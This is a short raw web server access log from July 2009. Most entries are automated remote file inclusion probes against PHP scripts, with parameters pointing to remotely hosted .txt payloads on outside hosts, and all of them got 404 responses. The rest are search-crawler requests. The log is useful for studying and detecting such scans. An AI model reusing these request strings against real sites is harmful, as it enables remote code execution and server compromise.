87.20.186.139 - - [26/Jul/2009:05:39:01 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:05:39:01 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
141.223.5.12 - - [26/Jul/2009:05:39:31 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.hair.gr/fx29id.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
141.223.5.12 - - [26/Jul/2009:05:39:32 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://www.hair.gr/fx29id.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
141.223.5.12 - - [26/Jul/2009:05:39:32 -0400] "GET /logs/access_log.Q109071600//bemarket/postscript/postscript.php?p_mode=http://www.hair.gr/fx29id.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:05:40:28 -0400] "GET /images/_notes/contact_mail_over.jpg.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.20.186.139 - - [26/Jul/2009:05:41:14 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
87.106.34.122 - - [26/Jul/2009:05:41:57 -0400] "GET //index.php?sayfa=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
87.106.34.122 - - [26/Jul/2009:05:42:03 -0400] "GET /logs/error_log.Q109061800//index.php?sayfa=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
74.6.22.169 - - [26/Jul/2009:05:42:05 -0400] "GET /logs/error_log.Q109061200 HTTP/1.0" 200 3584078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
